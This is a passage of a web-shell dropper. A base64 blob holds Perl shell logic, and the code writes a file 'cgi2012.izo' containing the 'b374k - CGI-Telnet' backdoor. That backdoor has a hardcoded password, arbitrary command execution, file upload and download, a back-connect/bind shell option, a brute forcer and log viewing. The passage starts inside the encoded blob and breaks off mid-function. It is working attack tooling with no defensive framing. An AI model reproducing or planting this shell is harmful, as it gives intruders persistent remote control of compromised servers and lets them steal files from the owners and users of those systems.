1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=';
        $file = fopen("cgi2012.izo", "w+");
        $write = fwrite($file, "#!/usr/bin/perl -I/usr/local/bandmin\nuse MIME::Base64;\n\$Version= \"CGI-Telnet Version 1.3\";\n\$EditPersion=\"<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>b374k - CGI-Telnet</font>\";\n\n\$Password = \"bandungkotasampah\";\t\t\t# Change this. You will need to enter this\n\t\t\t\t# to login.\nsub Is_Win(){\n\t\$os = &trim(\$ENV{\"SERVER_SOFTWARE\"});\n\tif(\$os =~ m/win/i){\n\t\treturn 1;\n\t}\n\telse{\n\t\treturn 0;\n\t}\n}\n\$WinNT = &Is_Win();\t\t\t\t# You need to change the value of this to 1 if\n\t\t\t\t\t\t\t\t# you're running this script on a Windows NT\n\t\t\t\t\t\t\t\t# machine. If you're running it on Unix, you\n\t\t\t\t\t\t\t\t# can leave the value as it is.\n\n\$NTCmdSep = \"&\";\t\t\t\t# This character is used to seperate 2 commands\n\t\t\t\t\t\t\t\t# in a command line on Windows NT.\n\n\$UnixCmdSep = \";\";\t\t\t\t# This character is used to seperate 2 commands\n\t\t\t\t\t\t\t\t# in a command line on Unix.\n\n\$CommandTimeoutDuration = 10000;\t# Time in seconds after commands will be killed\n\t\t\t\t\t\t\t\t# Don't set this to a very large value. This is\n\t\t\t\t\t\t\t\t# useful for commands that may hang or that\n\t\t\t\t\t\t\t\t# take very long to execute, like \"find /\".\n\t\t\t\t\t\t\t\t# This is valid only on Unix servers. It is\n\t\t\t\t\t\t\t\t# ignored on NT Servers.\n\n\$ShowDynamicOutput = 1;\t\t\t# If this is 1, then data is sent to the\n\t\t\t\t\t\t\t\t# browser as soon as it is output, otherwise\n\t\t\t\t\t\t\t\t# it is buffered and send when the command\n\t\t\t\t\t\t\t\t# completes. This is useful for commands like\n\t\t\t\t\t\t\t\t# ping, so that you can see the output as it\n\t\t\t\t\t\t\t\t# is being generated.\n\n# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!\n\n\$CmdSep = (\$WinNT ? \$NTCmdSep : \$UnixCmdSep);\n\$CmdPwd = (\$WinNT ? \"cd\" : \"pwd\");\n\$PathSep = (\$WinNT ? \"\\\\\" : \"/\");\n\$Redirector = (\$WinNT ? \" 2>&1 1>&2\" : \" 1>&1 2>&1\");\n\$cols= 150;\n\$rows= 26;\n#------------------------------------------------------------------------------\n# Reads the input sent by the browser and parses the input variables. It\n# parses GET, POST and multipart/form-data that is used for uploading files.\n# The filename is stored in \$in{'f'} and the data is stored in \$in{'filedata'}.\n# Other variables can be accessed using \$in{'var'}, where var is the name of\n# the variable. Note: Most of the code in this function is taken from other CGI\n# scripts.\n#------------------------------------------------------------------------------\nsub ReadParse \n{\n\tlocal (*in) = @_ if @_;\n\tlocal (\$i, \$loc, \$key, \$val);\n\t\n\t\$MultipartFormData = \$ENV{'CONTENT_TYPE'} =~ /multipart\\/form-data; boundary=(.+)\$/;\n\n\tif(\$ENV{'REQUEST_METHOD'} eq \"GET\")\n\t{\n\t\t\$in = \$ENV{'QUERY_STRING'};\n\t}\n\telsif(\$ENV{'REQUEST_METHOD'} eq \"POST\")\n\t{\n\t\tbinmode(STDIN) if \$MultipartFormData & \$WinNT;\n\t\tread(STDIN, \$in, \$ENV{'CONTENT_LENGTH'});\n\t}\n\n\t# handle file upload data\n\tif(\$ENV{'CONTENT_TYPE'} =~ /multipart\\/form-data; boundary=(.+)\$/)\n\t{\n\t\t\$Boundary = '--'.\$1; # please refer to RFC1867 \n\t\t@list = split(/\$Boundary/, \$in); \n\t\t\$HeaderBody = \$list[1];\n\t\t\$HeaderBody =~ /\\r\\n\\r\\n|\\n\\n/;\n\t\t\$Header = \$`;\n\t\t\$Body = \$';\n \t\t\$Body =~ s/\\r\\n\$//; # the last \\r\\n was put in by Netscape\n\t\t\$in{'filedata'} = \$Body;\n\t\t\$Header =~ /filename=\\\"(.+)\\\"/; \n\t\t\$in{'f'} = \$1; \n\t\t\$in{'f'} =~ s/\\\"//g;\n\t\t\$in{'f'} =~ s/\\s//g;\n\n\t\t# parse trailer\n\t\tfor(\$i=2; \$list[\$i]; \$i++)\n\t\t{ \n\t\t\t\$list[\$i] =~ s/^.+name=\$//;\n\t\t\t\$list[\$i] =~ /\\\"(\\w+)\\\"/;\n\t\t\t\$key = \$1;\n\t\t\t\$val = \$';\n\t\t\t\$val =~ s/(^(\\r\\n\\r\\n|\\n\\n))|(\\r\\n\$|\\n\$)//g;\n\t\t\t\$val =~ s/%(..)/pack(\"c\", hex(\$1))/ge;\n\t\t\t\$in{\$key} = \$val; \n\t\t}\n\t}\n\telse # standard post data (url encoded, not multipart)\n\t{\n\t\t@in = split(/&/, \$in);\n\t\tforeach \$i (0 .. \$#in)\n\t\t{\n\t\t\t\$in[\$i] =~ s/\\+/ /g;\n\t\t\t(\$key, \$val) = split(/=/, \$in[\$i], 2);\n\t\t\t\$key =~ s/%(..)/pack(\"c\", hex(\$1))/ge;\n\t\t\t\$val =~ s/%(..)/pack(\"c\", hex(\$1))/ge;\n\t\t\t\$in{\$key} .= \"\\0\" if (defined(\$in{\$key}));\n\t\t\t\$in{\$key} .= \$val;\n\t\t}\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML Page Header\n# Argument 1: Form item name to which focus should be set\n#------------------------------------------------------------------------------\nsub PrintPageHeader\n{\n\t\$EncodedCurrentDir = \$CurrentDir;\n\t\$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack(\"H*\",\$1)/eg;\n\tmy \$dir =\$CurrentDir;\n\t\$dir=~ s/\\\\/\\\\\\\\/g;\n\tprint \"Content-type: text/html\\n\\n\";\n\tprint <<END;\n<html>\n<head>\n<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">\n<title>Hacsugia</title>\n\n\$HtmlMetaHeader\n\n</head>\n<style>\nbody{\nfont: 10pt Verdana;\n}\ntr {\nBORDER-RIGHT:  #3e3e3e 1px solid;\nBORDER-TOP:    #3e3e3e 1px solid;\nBORDER-LEFT:   #3e3e3e 1px solid;\nBORDER-BOTTOM: #3e3e3e 1px solid;\ncolor: #ff9900;\n}\ntd {\nBORDER-RIGHT:  #3e3e3e 1px solid;\nBORDER-TOP:    #3e3e3e 1px solid;\nBORDER-LEFT:   #3e3e3e 1px solid;\nBORDER-BOTTOM: #3e3e3e 1px solid;\ncolor: #2BA8EC;\nfont: 10pt Verdana;\n}\n\ntable {\nBORDER-RIGHT:  #3e3e3e 1px solid;\nBORDER-TOP:    #3e3e3e 1px solid;\nBORDER-LEFT:   #3e3e3e 1px solid;\nBORDER-BOTTOM: #3e3e3e 1px solid;\nBACKGROUND-COLOR: #111;\n}\n\n\ninput {\nBORDER-RIGHT:  #3e3e3e 1px solid;\nBORDER-TOP:    #3e3e3e 1px solid;\nBORDER-LEFT:   #3e3e3e 1px solid;\nBORDER-BOTTOM: #3e3e3e 1px solid;\nBACKGROUND-COLOR: Black;\nfont: 10pt Verdana;\ncolor: #ff9900;\n}\n\ninput.submit {\ntext-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;\ncolor: #FFFFFF;\nborder-color: #009900;\n}\n\ncode {\nborder\t\t\t: dashed 0px #333;\nBACKGROUND-COLOR: Black;\nfont: 10pt Verdana bold;\ncolor: while;\n}\n\nrun {\nborder\t\t\t: dashed 0px #333;\nfont: 10pt Verdana bold;\ncolor: #FF00AA;\n}\n\ntextarea {\nBORDER-RIGHT:  #3e3e3e 1px solid;\nBORDER-TOP:    #3e3e3e 1px solid;\nBORDER-LEFT:   #3e3e3e 1px solid;\nBORDER-BOTTOM: #3e3e3e 1px solid;\nBACKGROUND-COLOR: #1b1b1b;\nfont: Fixedsys bold;\ncolor: #aaa;\n}\nA:link {\n\tCOLOR: #2BA8EC; TEXT-DECORATION: none\n}\nA:visited {\n\tCOLOR: #2BA8EC; TEXT-DECORATION: none\n}\nA:hover {\n\ttext-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;\n\tcolor: #ff9900; TEXT-DECORATION: none\n}\nA:active {\n\tcolor: Red; TEXT-DECORATION: none\n}\n\n.listdir tr:hover{\n\tbackground: #444;\n}\n.listdir tr:hover td{\n\tbackground: #444;\n\ttext-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;\n\tcolor: #FFFFFF; TEXT-DECORATION: none;\n}\n.notline{\n\tbackground: #111;\n}\n.line{\n\tbackground: #222;\n}\n</style>\n<script language=\"javascript\">\nfunction chmod_form(i,file)\n{\n\t/*var ajax='ajax_PostData(\"FormPerms_'+i+'\",\"\$ScriptLocation\",\"ResponseData\"); return false;';*/\n\tvar ajax=\"\";\n\tdocument.getElementById(\"FilePerms_\"+i).innerHTML=\"<form name=FormPerms_\" + i+ \" action='' method='POST'><input id=text_\" + i + \"  name=chmod type=text size=5 /><input type=submit class='submit' onclick='\" + ajax + \"' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='\$dir'><input type=hidden name=f value='\"+file+\"'></form>\";\n\tdocument.getElementById(\"text_\" + i).focus();\n}\nfunction rm_chmod_form(response,i,perms,file)\n{\n\tresponse.innerHTML = \"<span onclick=\\\\\\\"chmod_form(\" + i + \",'\"+ file+ \"')\\\\\\\" >\"+ perms +\"</span></td>\";\n}\nfunction rename_form(i,file,f)\n{\n\tvar ajax=\"\";\n\tf.replace(/\\\\\\\\/g,\"\\\\\\\\\\\\\\\\\");\n\tvar back=\"rm_rename_form(\"+i+\",\\\\\\\"\"+file+\"\\\\\\\",\\\\\\\"\"+f+\"\\\\\\\"); return false;\";\n\tdocument.getElementById(\"File_\"+i).innerHTML=\"<form name=FormPerms_\" + i+ \" action='' method='POST'><input id=text_\" + i + \"  name=rename type=text value= '\"+file+\"' /><input type=submit class='submit' onclick='\" + ajax + \"' value=OK><input type=submit class='submit' onclick='\" + back + \"' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='\$dir'><input type=hidden name=f value='\"+file+\"'></form>\";\n\tdocument.getElementById(\"text_\" + i).focus();\n}\nfunction rm_rename_form(i,file,f)\n{\n\tif(f=='f')\n\t{\n\t\tdocument.getElementById(\"File_\"+i).innerHTML=\"<a href='?a=command&d=\$dir&c=edit%20\"+file+\"%20'>\" +file+ \"</a>\";\n\t}else\n\t{\n\t\tdocument.getElementById(\"File_\"+i).innerHTML=\"<a href='?a=gui&d=\"+f+\"'>[ \" +file+ \" ]</a>\";\n\t}\n}\n</script>\n<body onLoad=\"document.f.@_.focus()\" bgcolor=\"#0c0c0c\" topmargin=\"0\" leftmargin=\"0\" marginwidth=\"0\" marginheight=\"0\">\n<center><code>\n<table border=\"1\" width=\"100%\" cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n\t<td align=\"center\" rowspan=2>\n\t\t<b><font size=\"5\">\$EditPersion</font></b>\n\t</td>\n\n\t<td>\n\n\t\t<font face=\"Verdana\" size=\"2\">\$ENV{\"SERVER_SOFTWARE\"}</font>\n\t</td>\n\t<td>Server IP:<font color=\"#cc0000\"> \$ENV{'SERVER_ADDR'}</font> | Your IP: <font color=\"#000000\">\$ENV{'REMOTE_ADDR'}</font>\n\t</td>\n\n</tr>\n\n<tr>\n<td colspan=\"3\"><font face=\"Verdana\" size=\"2\">\n<a href=\"\$ScriptLocation\">Home</a> | \n<a href=\"\$ScriptLocation?a=command&d=\$EncodedCurrentDir\">Command</a> |\n<a href=\"\$ScriptLocation?a=gui&d=\$EncodedCurrentDir\">GUI</a> | \n<a href=\"\$ScriptLocation?a=upload&d=\$EncodedCurrentDir\">Upload File</a> | \n<a href=\"\$ScriptLocation?a=download&d=\$EncodedCurrentDir\">Download File</a> |\n\n<a href=\"\$ScriptLocation?a=backbind\">Back & Bind</a> |\n<a href=\"\$ScriptLocation?a=bruteforcer\">Brute Forcer</a> |\n<a href=\"\$ScriptLocation?a=checklog\">Check Log</a> |\n<a href=\"\$ScriptLocation?a=domainsuser\">Domains/Users</a> |\n<a href=\"\$ScriptLocation?a=logout\">Logout</a> |\n<a target='_blank' href=\"#\">Help</a>\n\n</font></td>\n</tr>\n</table>\n<font id=\"ResponseData\" color=\"#ff99cc\" >\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the Login Screen\n#------------------------------------------------------------------------------\nsub PrintLoginScreen\n{\n\n\tprint <<END;\n<pre><script type=\"text/javascript\">\nTypingText = function(element, interval, cursor, finishedCallback) {\n  if((typeof document.getElementById == \"undefined\") || (typeof element.innerHTML == \"undefined\")) {\n    this.running = true;\t// Never run.\n    return;\n  }\n  this.element = element;\n  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });\n  this.interval = (typeof interval == \"undefined\" ? 100 : interval);\n  this.origText = this.element.innerHTML;\n  this.unparsedOrigText = this.origText;\n  this.cursor = (cursor ? cursor : \"\");\n  this.currentText = \"\";\n  this.currentChar = 0;\n  this.element.typingText = this;\n  if(this.element.id == \"\") this.element.id = \"typingtext\" + TypingText.currentIndex++;\n  TypingText.all.push(this);\n  this.running = false;\n  this.inTag = false;\n  this.tagBuffer = \"\";\n  this.inHTMLEntity = false;\n  this.HTMLEntityBuffer = \"\";\n}\nTypingText.all = new Array();\nTypingText.currentIndex = 0;\nTypingText.runAll = function() {\n  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();\n}\nTypingText.prototype.run = function() {\n  if(this.running) return;\n  if(typeof this.origText == \"undefined\") {\n    setTimeout(\"document.getElementById('\" + this.element.id + \"').typingText.run()\", this.interval);\t// We haven't finished loading yet.  Have patience.\n    return;\n  }\n  if(this.currentText == \"\") this.element.innerHTML = \"\";\n//  this.origText = this.origText.replace(/<([^<])*>/, \"\");     // Strip HTML from text.\n  if(this.currentChar < this.origText.length) {\n    if(this.origText.charAt(this.currentChar) == \"<\" && !this.inTag) {\n      this.tagBuffer = \"<\";\n      this.inTag = true;\n      this.currentChar++;\n      this.run();\n      return;\n    } else if(this.origText.charAt(this.currentChar) == \">\" && this.inTag) {\n      this.tagBuffer += \">\";\n      this.inTag = false;\n      this.currentText += this.tagBuffer;\n      this.currentChar++;\n      this.run();\n      return;\n    } else if(this.inTag) {\n      this.tagBuffer += this.origText.charAt(this.currentChar);\n      this.currentChar++;\n      this.run();\n      return;\n    } else if(this.origText.charAt(this.currentChar) == \"&\" && !this.inHTMLEntity) {\n      this.HTMLEntityBuffer = \"&\";\n      this.inHTMLEntity = true;\n      this.currentChar++;\n      this.run();\n      return;\n    } else if(this.origText.charAt(this.currentChar) == \";\" && this.inHTMLEntity) {\n      this.HTMLEntityBuffer += \";\";\n      this.inHTMLEntity = false;\n      this.currentText += this.HTMLEntityBuffer;\n      this.currentChar++;\n      this.run();\n      return;\n    } else if(this.inHTMLEntity) {\n      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);\n      this.currentChar++;\n      this.run();\n      return;\n    } else {\n      this.currentText += this.origText.charAt(this.currentChar);\n    }\n    this.element.innerHTML = this.currentText;\n    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == \"function\" ? this.cursor(this.currentText) : this.cursor) : \"\");\n    this.currentChar++;\n    setTimeout(\"document.getElementById('\" + this.element.id + \"').typingText.run()\", this.interval);\n  } else {\n\tthis.currentText = \"\";\n\tthis.currentChar = 0;\n        this.running = false;\n        this.finishedCallback();\n  }\n}\n</script>\n</pre>\n\n<font style=\"font: 15pt Verdana; color: yellow;\">Copyright (C) 2001 Rohitab Batra </font><br><br>\n<table align=\"center\" border=\"1\" width=\"600\" heigh>\n<tbody><tr>\n<td valign=\"top\" background=\"http://dl.dropbox.com/u/10860051/images/matran.gif\"><p id=\"hack\" style=\"margin-left: 3px;\">\n<font color=\"#009900\"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>\n\n<font color=\"#009900\"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>\n<font color=\"#F00000\"><font color=\"#FFF000\">~\\\$</font> Connected ! </font><br>\n<font color=\"#009900\"><font color=\"#FFF000\">\$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>\n\n<font color=\"#009900\"><font color=\"#FFF000\">\$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>\n\n<font color=\"#F00000\"><font color=\"#FFF000\">\$ServerName~</font>\\\$ Connected Command! </font><br>\n<font color=\"#009900\"><font color=\"#FFF000\">\$ServerName~<font color=\"#F00000\">\\\$</font></font> OK! You can kill it!</font>\n</tr>\n</tbody></table>\n<br>\n\n<script type=\"text/javascript\">\nnew TypingText(document.getElementById(\"hack\"), 30, function(i){ var ar = new Array(\"_\",\"\"); return \" \" + ar[i.length % ar.length]; });\nTypingText.runAll();\n\n</script>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Add html special chars\n#------------------------------------------------------------------------------\nsub HtmlSpecialChars(\$){\n\tmy \$text = shift;\n\t\$text =~ s/&/&amp;/g;\n\t\$text =~ s/\"/&quot;/g;\n\t\$text =~ s/'/&#039;/g;\n\t\$text =~ s/</&lt;/g;\n\t\$text =~ s/>/&gt;/g;\n\treturn \$text;\n}\n#------------------------------------------------------------------------------\n# Add link for directory\n#------------------------------------------------------------------------------\nsub AddLinkDir(\$)\n{\n\tmy \$ac=shift;\n\tmy @dir=();\n\tif(\$WinNT)\n\t{\n\t\t@dir=split(/\\\\/,\$CurrentDir);\n\t}else\n\t{\n\t\t@dir=split(\"/\",&trim(\$CurrentDir));\n\t}\n\tmy \$path=\"\";\n\tmy \$result=\"\";\n\tforeach (@dir)\n\t{\n\t\t\$path .= \$_.\$PathSep;\n\t\t\$result.=\"<a href='?a=\".\$ac.\"&d=\".\$path.\"'>\".\$_.\$PathSep.\"</a>\";\n\t}\n\treturn \$result;\n}\n#------------------------------------------------------------------------------\n# Prints the message that informs the user of a failed login\n#------------------------------------------------------------------------------\nsub PrintLoginFailedMessage\n{\n\tprint <<END;\n<br>Login : Administrator<br>\n\nPassword:<br>\nLogin incorrect<br><br>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form for logging in\n#------------------------------------------------------------------------------\nsub PrintLoginForm\n{\n\tprint <<END;\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n<input type=\"hidden\" name=\"a\" value=\"login\">\nLogin : Administrator<br>\nPassword:<input type=\"password\" name=\"p\">\n<input class=\"submit\" type=\"submit\" value=\"Enter\">\n</form>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the footer for the HTML Page\n#------------------------------------------------------------------------------\nsub PrintPageFooter\n{\n\tprint \"<br><font color=red>o---[  <font color=#ff9900>Edit by \$EditPersion </font>  ]---o</font></code></center></body></html>\";\n}\n\n#------------------------------------------------------------------------------\n# Retreives the values of all cookies. The cookies can be accesses using the\n# variable \$Cookies{''}\n#------------------------------------------------------------------------------\nsub GetCookies\n{\n\t@httpcookies = split(/; /,\$ENV{'HTTP_COOKIE'});\n\tforeach \$cookie(@httpcookies)\n\t{\n\t\t(\$id, \$val) = split(/=/, \$cookie);\n\t\t\$Cookies{\$id} = \$val;\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Prints the screen when the user logs out\n#------------------------------------------------------------------------------\nsub PrintLogoutScreen\n{\n\tprint \"Connection closed by foreign host.<br><br>\";\n}\n\n#------------------------------------------------------------------------------\n# Logs out the user and allows the user to login again\n#------------------------------------------------------------------------------\nsub PerformLogout\n{\n\tprint \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie\n\t&PrintPageHeader(\"p\");\n\t&PrintLogoutScreen;\n\n\t&PrintLoginScreen;\n\t&PrintLoginForm;\n\t&PrintPageFooter;\n\texit;\n}\n\n#------------------------------------------------------------------------------\n# This function is called to login the user. If the password matches, it\n# displays a page that allows the user to run commands. If the password doens't\n# match or if no password is entered, it displays a form that allows the user\n# to login\n#------------------------------------------------------------------------------\nsub PerformLogin \n{\n\tif(\$LoginPassword eq \$Password) # password matched\n\t{\n\t\tprint \"Set-Cookie: SAVEDPWD=\$LoginPassword;\\n\";\n\t\t&PrintPageHeader;\n\t\tprint &ListDir;\n\t}\n\telse # password didn't match\n\t{\n\t\t&PrintPageHeader(\"p\");\n\t\t&PrintLoginScreen;\n\t\tif(\$LoginPassword ne \"\") # some password was entered\n\t\t{\n\t\t\t&PrintLoginFailedMessage;\n\n\t\t}\n\t\t&PrintLoginForm;\n\t\t&PrintPageFooter;\n\t\texit;\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form that allows the user to enter commands\n#------------------------------------------------------------------------------\nsub PrintCommandLineInputForm\n{\n\tmy \$dir= \"<span style='font: 11pt Verdana; font-weight: bold;'>\".&AddLinkDir(\"command\").\"</span>\";\n\t\$Prompt = \$WinNT ? \"\$dir > \" : \"<font color='#66ff66'>[admin\\@\$ServerName \$dir]\\\$</font> \";\n\treturn <<END;\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n\n<input type=\"hidden\" name=\"a\" value=\"command\">\n\n<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n\$Prompt\n<input type=\"text\" size=\"50\" name=\"c\">\n<input class=\"submit\"type=\"submit\" value=\"Enter\">\n</form>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form that allows the user to download files\n#------------------------------------------------------------------------------\nsub PrintFileDownloadForm\n{\n\tmy \$dir = &AddLinkDir(\"download\"); \n\t\$Prompt = \$WinNT ? \"\$dir > \" : \"[admin\\@\$ServerName \$dir]\\\$ \";\n\treturn <<END;\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n<input type=\"hidden\" name=\"a\" value=\"download\">\n\$Prompt download<br><br>\nFilename: <input class=\"file\" type=\"text\" name=\"f\" size=\"35\"><br><br>\nDownload: <input class=\"submit\" type=\"submit\" value=\"Begin\">\n\n</form>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form that allows the user to upload files\n#------------------------------------------------------------------------------\nsub PrintFileUploadForm\n{\n\tmy \$dir= &AddLinkDir(\"upload\");\n\t\$Prompt = \$WinNT ? \"\$dir > \" : \"[admin\\@\$ServerName \$dir]\\\$ \";\n\treturn <<END;\n<form name=\"f\" enctype=\"multipart/form-data\" method=\"POST\" action=\"\$ScriptLocation\">\n\$Prompt upload<br><br>\nFilename: <input class=\"file\" type=\"file\" name=\"f\" size=\"35\"><br><br>\nOptions: &nbsp;<input type=\"checkbox\" name=\"o\" id=\"up\" value=\"overwrite\">\n<label for=\"up\">Overwrite if it Exists</label><br><br>\nUpload:&nbsp;&nbsp;&nbsp;<input class=\"submit\" type=\"submit\" value=\"Begin\">\n<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n<input class=\"submit\" type=\"hidden\" name=\"a\" value=\"upload\">\n\n</form>\n\nEND\n}\n\n#------------------------------------------------------------------------------\n# This function is called when the timeout for a command expires. We need to\n# terminate the script immediately. This function is valid only on Unix. It is\n# never called when the script is running on NT.\n#------------------------------------------------------------------------------\nsub CommandTimeout\n{\n\tif(!\$WinNT)\n\t{\n\t\talarm(0);\n\t\treturn <<END;\n</textarea>\n<br><font color=yellow>\nCommand exceeded maximum time of \$CommandTimeoutDuration second(s).</font>\n<br><font size='6' color=red>Killed it!</font>\nEND\n\t}\n}\n\n\n\n#------------------------------------------------------------------------------\n# This function displays the page that contains a link which allows the user\n# to download the specified file. The page also contains a auto-refresh\n# feature that starts the download automatically.\n# Argument 1: Fully qualified filename of the file to be downloaded\n#------------------------------------------------------------------------------\nsub PrintDownloadLinkPage\n{\n\tlocal(\$FileUrl) = @_;\n\tmy \$result=\"\";\n\tif(-e \$FileUrl) # if the file exists\n\t{\n\t\t# encode the file link so we can send it to the browser\n\t\t\$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack(\"H*\",\$1)/eg;\n\t\t\$DownloadLink = \"\$ScriptLocation?a=download&f=\$FileUrl&o=go\";\n\t\t\$HtmlMetaHeader = \"<meta HTTP-EQUIV=\\\"Refresh\\\" CONTENT=\\\"1; URL=\$DownloadLink\\\">\";\n\t\t&PrintPageHeader(\"c\");\n\t\t\$result .= <<END;\nSending File \$TransferFile...<br>\n\nIf the download does not start automatically,\n<a href=\"\$DownloadLink\">Click Here</a>\nEND\n\t\t\$result .= &PrintCommandLineInputForm;\n\t}\n\telse # file doesn't exist\n\t{\n\t\t\$result .= \"Failed to download \$FileUrl: \$!\";\n\t\t\$result .= &PrintFileDownloadForm;\n\t}\n\treturn \$result;\n}\n\n#------------------------------------------------------------------------------\n# This function reads the specified file from the disk and sends it to the\n# browser, so that it can be downloaded by the user.\n# Argument 1: Fully qualified pathname of the file to be sent.\n#------------------------------------------------------------------------------\nsub SendFileToBrowser\n{\n\tmy \$result = \"\";\n\tlocal(\$SendFile) = @_;\n\tif(open(SENDFILE, \$SendFile)) # file opened for 